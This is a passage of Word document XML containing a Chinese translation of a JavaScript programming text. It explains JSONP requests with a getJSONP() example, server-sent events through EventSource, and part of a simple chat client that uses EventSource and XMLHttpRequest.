        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素调用，必须返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>响应，而不应该是普</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>通的</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>响应。这个可以通过在</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中添加一个查询参数来实现：例如，追加</w:t>
      </w:r>
      <w:r>
        <w:t>"?json"</w:t>
      </w:r>
      <w:r>
        <w:t>（或＆</w:t>
      </w:r>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在实践中，支持</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>的服务不会强制指定客户端必须实现的回调函数名称，比如</w:t>
      </w:r>
      <w:r>
        <w:t>handleResponse</w:t>
      </w:r>
      <w:r>
        <w:t>。相反，它们使用查询参数的值，允许客户端指定一个函数名，然后使用函数名去填充响应。例</w:t>
      </w:r>
      <w:r>
        <w:t>18-14</w:t>
      </w:r>
      <w:r>
        <w:t>使用一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>jsonp</w:t>
      </w:r>
      <w:r>
        <w:t>的查询参数来指定回调函数的名称。许多支持</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>的服务都能分</w:t>
      </w:r>
      <w:r>
        <w:t>辨出这个参数名。另一个常见的参数名称是</w:t>
      </w:r>
      <w:r>
        <w:t>callback</w:t>
      </w:r>
      <w:r>
        <w:t>，为了让使用到的服务支持类似特殊的需求，就需要在代码上做一些修改了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-14</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>getJSONP()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，它发送</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>请求。这个例子有点复杂，有几点值得注意。首先，注意它是如何创建一个新的＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，设置其</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，并把它插入到文档中的。正是该插入操作触发</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求。其次，注意例</w:t>
      </w:r>
      <w:r>
        <w:t>18-14</w:t>
      </w:r>
      <w:r>
        <w:t>为每个请求都创建了一个全新的内部回调函数，回调函数作为</w:t>
      </w:r>
      <w:r>
        <w:t>getJSONP()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的一个属性存储起来。最后要注意的是回调函数做了一些必要的清理工作</w:t>
      </w:r>
      <w:r>
        <w:t>：删除脚本元素，并删除自身。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-14</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>元素发送</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>根据指定的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>发送一个</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>然后把解析得到的响应数据传递给回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中添加一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>jsonp</w:t>
      </w:r>
      <w:r>
        <w:t>的查询参数，用于指定该请求的回调函数的名称</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getJSONP(url,callback){//</w:t>
      </w:r>
      <w:r>
        <w:t>为本次请求创建一个唯一的回调函数名称</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var cbnum="cb"+getJSONP.counter++;//</w:t>
      </w:r>
      <w:r>
        <w:t>每次自增计数器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>cbname="getJSONP."+cbnum;//</w:t>
      </w:r>
      <w:r>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>函数的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将回调函数名称以表单编码的形式添加到</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的查询部分中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>jsonp</w:t>
      </w:r>
      <w:r>
        <w:t>作为参数名，一些支持</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>的服务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>可能使用其他的参数名，比如</w:t>
      </w:r>
      <w:r>
        <w:t>callback</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(url.indexOf("?")===-1)//URL</w:t>
      </w:r>
      <w:r>
        <w:t>没有查询部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>url+="?jsonp="+cbname;//</w:t>
      </w:r>
      <w:r>
        <w:t>作为查询部分添加参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else//</w:t>
      </w:r>
      <w:r>
        <w:t>否则</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>url+="</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>jsonp="+cbname;//</w:t>
      </w:r>
      <w:r>
        <w:t>作为新的参数添加它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>元素用于发送请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var script=document.createElement("script");//</w:t>
      </w:r>
      <w:r>
        <w:t>定义将被脚本执行的回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>getJSONP[cbnum]=function(response){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>callback(response);//</w:t>
      </w:r>
      <w:r>
        <w:t>处理响应数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>finally{//</w:t>
      </w:r>
      <w:r>
        <w:t>即使回调函数或响应抛出错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete getJSONP[cbnum];//</w:t>
      </w:r>
      <w:r>
        <w:t>删除该函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>script.parentNode.removeChild(script);//</w:t>
      </w:r>
      <w:r>
        <w:t>移除</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>立即触发</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>script.src=url;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置脚本的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.body.appendChild(script);//</w:t>
      </w:r>
      <w:r>
        <w:t>把它添加到文档中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>getJSONP.counter=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>用于创建唯一回调函数名称的计数器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="459" w:name="18_3_Ji_Yu_Fu_Wu_Qi_Duan_Tui_Song_Shi_Ji"/>
      <w:r>
        <w:t>18.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　基于服务器端推送事件的</w:t>
      </w:r>
      <w:r>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>技术</w:t>
      </w:r>
      <w:bookmarkEnd w:id="459"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在服务器端推送事件的标准草案中定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>对象，简化了</w:t>
      </w:r>
      <w:r>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序的编写可以传递一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，然后在返回的实例上监听消息事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var ticker=new EventSourc</w:t>
      </w:r>
      <w:r>
        <w:t>e("stockprices.php");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ticker.onmessage=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var type=e.type;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data=e.data;//</w:t>
      </w:r>
      <w:r>
        <w:t>现在处理事件类型和事件的字符串数据</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与</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>事件关联的事件对象有一个</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性，这个属性保存服务器作为该事件的负载发送的任何字符串。如同其他类型的事件一样，该对象还有一个</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性，默认值是</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>，事件源可以修改这个值。</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序接收从一个给定的服务器事件源发出的所有事件，如果有必要，也可以</w:t>
      </w:r>
      <w:r>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性派发一个事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>服务器端推送事件的协议很简单。客户端（创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>对象时会）建立一个到服务器的连接，服务器保持这个连接处于打开状态。当发生一个事件时，服务器端在连接中写入几行文本，抛给客户端的事件可能看起来是这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="1789981" cy="504645"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="43" name="00043.jpeg" descr="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00043.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1789981" cy="504645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该协议还有一些额外的细节，比如允许事件携带给定</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>，然后再次连上的客户端告诉服务器它收到的最后一个事件的</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>，这样服务器就可以重新发送客户端错过的事件。但是这些细节在此处并不重要。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Comet</w:t>
      </w:r>
      <w:r>
        <w:t>架构的一个常见应用是聊天应用，聊天客户端可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpR</w:t>
      </w:r>
      <w:r>
        <w:t>equest</w:t>
      </w:r>
      <w:r>
        <w:t>向聊天室发送新的消息，也可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>对象订阅聊天信息。例</w:t>
      </w:r>
      <w:r>
        <w:t>18-15</w:t>
      </w:r>
      <w:r>
        <w:t>展示了使用</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>写一个聊天客户端是多么容易。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:t>18-15</w:t>
      </w:r>
      <w:r>
        <w:t>：一个使用</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>的简易聊天客户端</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.onload=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>注意一些</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>细节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var nick=prompt("Enter your nickname");//</w:t>
      </w:r>
      <w:r>
        <w:t>获取用户昵称</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>input=document.getElementById("input");//</w:t>
      </w:r>
      <w:r>
        <w:t>找出</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>表单元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>input.focus();//</w:t>
      </w:r>
      <w:r>
        <w:t>设置键盘焦点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>注册新消息的通知</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var chat=new EventSource("/chat");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>chat.onmessage=function(event){//</w:t>
      </w:r>
      <w:r>
        <w:t>当捕获一条消息时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var msg=event.data;//</w:t>
      </w:r>
      <w:r>
        <w:t>从事件对象中取得文本数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>node=document.createTextNode(msg);//</w:t>
      </w:r>
      <w:r>
        <w:t>把它放入一个文本节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var div=document.createElement("div");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>div.appendChild(node);//</w:t>
      </w:r>
      <w:r>
        <w:t>将文本节点插入</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.body.insertBefore(div,input);//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>插入</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>之前</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>input.scrollIntoView();//</w:t>
      </w:r>
      <w:r>
        <w:t>保证</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>元素可见</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>把用户的消息发送给服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>input.onchange=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>用户完成输入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var msg=nick+":"+input.value;//</w:t>
      </w:r>
      <w:r>
        <w:t>组合用户名和用户输入的信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var xhr=new XMLHttpRequest();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建新的</w:t>
      </w:r>
      <w:r>
        <w:t>XHR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.open("POST","/chat");//</w:t>
      </w:r>
      <w:r>
        <w:t>发送到</w:t>
      </w:r>
      <w:r>
        <w:t>/chat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.setRequestHeader("Content-Type",//</w:t>
      </w:r>
      <w:r>
        <w:t>指明为普通的</w:t>
      </w:r>
      <w:r>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:t>文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"text/plain;charset=UTF-8");</w:t>
      </w:r>
    </w:p>
